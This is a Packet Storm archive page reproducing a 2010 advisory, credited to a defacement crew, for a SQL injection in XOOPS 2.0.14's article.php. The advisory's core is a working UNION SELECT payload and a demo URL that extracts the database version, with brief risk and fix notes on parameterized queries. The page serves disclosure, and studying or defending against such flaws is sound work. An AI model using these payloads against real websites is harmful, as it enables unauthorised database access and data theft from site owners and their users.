exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

XOOPS 2.0.14 SQL Injection

XOOPS 2.0.14 SQL Injection
Posted Aug 30, 2010
Authored by []0iZy5

XOOPS version 2.0.14 suffers from a remote SQL injection vulnerability in article.php.

tags | exploit, remote, php, sql injection
SHA-256 | 0d05f53038ebe7966e0045884b89cae298720cccbe1aae392cb27319f71ab6b0

XOOPS 2.0.14 SQL Injection

Change Mirror Download
##################################################################
##################################################################
# ___ ___ _ _____ __ _ #
# / _ \ / _ \| | | __ \ / _| | | #
# _ __| | | | | | | |_| | | | ___| |_ __ _ ___ ___ __| | #
# | '__| | | | | | | __| | | |/ _ \ _/ _` |/ __/ _ \/ _` | #
# | | | |_| | |_| | |_| |__| | __/ || (_| | (_| __/ (_| | #
# |_| \___/ \___/ \__|_____/ \___|_| \__,_|\___\___|\__,_| #
# #
# #
# +-+-+-+-+ #
# |C|r|e|w| #
# +-+-+-+-+ #
##################################################################
##################################################################
# [#] XOOPS 2.0.14 (article.php) SQL Injection Vulnerability #
# [#] Discovered By []0iZy5 #
# [#] http://r00tDefaced.com & uNkn0wn.eu(is back) #
# [#] Greetz: Gn0515, Silic0n, my bb(denys) & r00tDefaced Members#
##################################################################
#
# [2]-SQL injection
#
# Vulnerability Description:
# SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed.
#
# Affected items:
# http://127.0.0.1/path/modules/articles/article.php?id=[SQL Injection]
#
# Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [You can find the number of vulnerable query]
# Demo: http://www.site.com/modules/articles/article.php?id=1%20union%20all%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
#
# The Risk:
# By exploiting this vulnerability, an attacker can inject malicious code in the script and can have access to the database.
#
# Fix the vulnerability:
# To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parametrized statements must be used #(preferred), or user input must be carefully escaped or filtered.
#
#################################################################
#################################################################

# r00tDefaced.com [28/08/2010]

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close